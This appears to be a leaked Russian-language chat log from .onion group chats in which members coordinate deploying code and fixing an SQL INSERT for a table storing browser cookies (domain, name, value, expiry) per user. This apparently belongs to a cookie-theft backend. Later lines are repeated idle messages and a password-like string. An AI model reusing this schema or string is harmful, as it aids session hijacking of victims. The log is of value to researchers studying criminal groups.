2021-09-03T09:31:17.971027  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Ок
	[en] <?>
	[fr] <?>

2021-09-03T11:49:56.200310  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] А есть вариант просто на сервер залить этот код пока что?
	[en] <?>
	[fr] <?>

2021-09-03T11:50:22.705601  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Чтобы мы потестили, а с гитом позже разобраться7
	[en] <?>
	[fr] <?>

2021-09-03T11:57:50.005207  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] зулас запушил
	[en] <?>
	[fr] <?>

2021-09-03T11:57:56.219383  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] я его попросил выгрузить на сервер
	[en] <?>
	[fr] <?>

2021-09-03T11:58:32.838558  ttrr@conference.q3mcco35auwcstmt.onion
	[ru]  driver или ты выгрузи сам
	[en] <?>
	[fr] <?>

2021-09-03T12:17:17.911828  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Ок
	[en] <?>
	[fr] <?>

2021-09-03T12:17:26.285571  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Выгружу.
	[en] <?>
	[fr] <?>

2021-09-03T12:54:25.744793  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] SQL = "INSERT INTO data84 (created_at, \"group\", id_low, id_high, username, browser, \"domain\", cookie_name, cookie_value, created, expires, path ) VALUES ( NOW(), $1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11, $12, $13 )",
	[en] <?>
	[fr] <?>

2021-09-03T12:55:03.224171  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] @zulas не вставил 2 поля в запрос в базу.
	[en] <?>
	[fr] <?>

2021-09-03T12:55:17.837652  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Поправь пожалуйста.
	[en] <?>
	[fr] <?>

2021-09-03T13:02:44.311709  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] И таблицу архива куков, там тоже эти 2 поля нужны будут.
	[en] <?>
	[fr] <?>

2021-09-03T13:03:34.031083  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] По остальному посмотрел, вижу схему нормальную сделал, все ок. Это у нас недавно было актуальной проблемой.
	[en] <?>
	[fr] <?>

2021-09-03T13:04:19.050514  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] cookies_archive*
	[en] <?>
	[fr] <?>

2021-09-03T13:23:45.184958  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] zulas отпиши по времени, когда сможешь сделать фиксы
	[en] <?>
	[fr] <?>

2021-09-03T13:44:34.796607  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] щас посмотрю
	[en] <?>
	[fr] <?>

2021-09-03T13:46:05.462879  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] @driver cookies_archive* .. я такой таблицей не пользуюсь
	[en] <?>
	[fr] <?>

2021-09-03T13:56:14.445082  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] пофиксил запрос
	[en] <?>
	[fr] <?>

2021-09-03T13:56:17.184880  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] не тестировал
	[en] <?>
	[fr] <?>

2021-09-06T07:10:08.071474  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] сегодня отдых у всех ?
	[en] <?>
	[fr] <?>

2021-09-06T10:24:06.853170  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] сегодня отдых у всех ?
	[en] <?>
	[fr] <?>

2021-09-06T14:25:14.173391  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] сегодня отдых у всех ?
	[en] <?>
	[fr] <?>

2021-09-07T07:12:19.348324  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] сегодня отдых у всех ?
	[en] <?>
	[fr] <?>

2021-09-07T17:51:07.156128  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] сегодня отдых у всех ?
	[en] <?>
	[fr] <?>

2021-09-08T06:28:58.561881  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] сегодня отдых у всех ?
	[en] <?>
	[fr] <?>

2021-09-09T07:31:36.704969  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] сегодня отдых у всех ?
	[en] <?>
	[fr] <?>

2021-09-10T07:06:36.942857  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] сегодня отдых у всех ?
	[en] <?>
	[fr] <?>

2021-09-13T06:35:46.794717  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] сегодня отдых у всех ?
	[en] <?>
	[fr] <?>

2021-09-14T08:12:09.363241  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] сегодня отдых у всех ?
	[en] <?>
	[fr] <?>

2021-09-14T08:12:09.364003  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] есть кто
	[en] <?>
	[fr] <?>

2021-09-15T07:09:26.714623  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] сегодня отдых у всех ?
	[en] <?>
	[fr] <?>

2021-09-15T07:09:26.715161  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] есть кто
	[en] <?>
	[fr] <?>

2021-09-16T06:48:07.676226  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] сегодня отдых у всех ?
	[en] <?>
	[fr] <?>

2021-09-16T06:48:07.676799  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] есть кто
	[en] <?>
	[fr] <?>

2021-09-16T07:03:23.248640  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] сегодня отдых у всех ?
	[en] <?>
	[fr] <?>

2021-09-16T07:03:23.249288  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] есть кто
	[en] <?>
	[fr] <?>

2021-09-16T07:44:08.221615  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] сегодня отдых у всех ?
	[en] <?>
	[fr] <?>

2021-09-16T07:44:08.222902  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] есть кто
	[en] <?>
	[fr] <?>

2021-09-16T15:03:14.324045  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] сегодня отдых у всех ?
	[en] <?>
	[fr] <?>

2021-09-16T15:03:14.324712  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] есть кто
	[en] <?>
	[fr] <?>

2021-09-17T06:38:25.586569  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] сегодня отдых у всех ?
	[en] <?>
	[fr] <?>

2021-09-17T06:38:25.587545  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] есть кто
	[en] <?>
	[fr] <?>

2021-09-20T07:03:38.429758  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] сегодня отдых у всех ?
	[en] <?>
	[fr] <?>

2021-09-20T07:03:38.430364  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] есть кто
	[en] <?>
	[fr] <?>

2021-09-21T08:12:31.353649  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] сегодня отдых у всех ?
	[en] <?>
	[fr] <?>

2021-09-21T08:12:31.355229  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] есть кто
	[en] <?>
	[fr] <?>

2021-09-21T10:18:12.568573  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] сегодня отдых у всех ?
	[en] <?>
	[fr] <?>

2021-09-21T10:18:12.570067  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] есть кто
	[en] <?>
	[fr] <?>

2021-12-09T18:55:28.384496  hof@q3mcco35auwcstmt.onion
	[ru] lIR7bXIxAukQuss2rg1Z
	[en] <?>
	[fr] <?>

2021-12-09T18:55:28.387517  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] lIR7bXIxAukQuss2rg1Z
	[en] <?>
	[fr] <?>

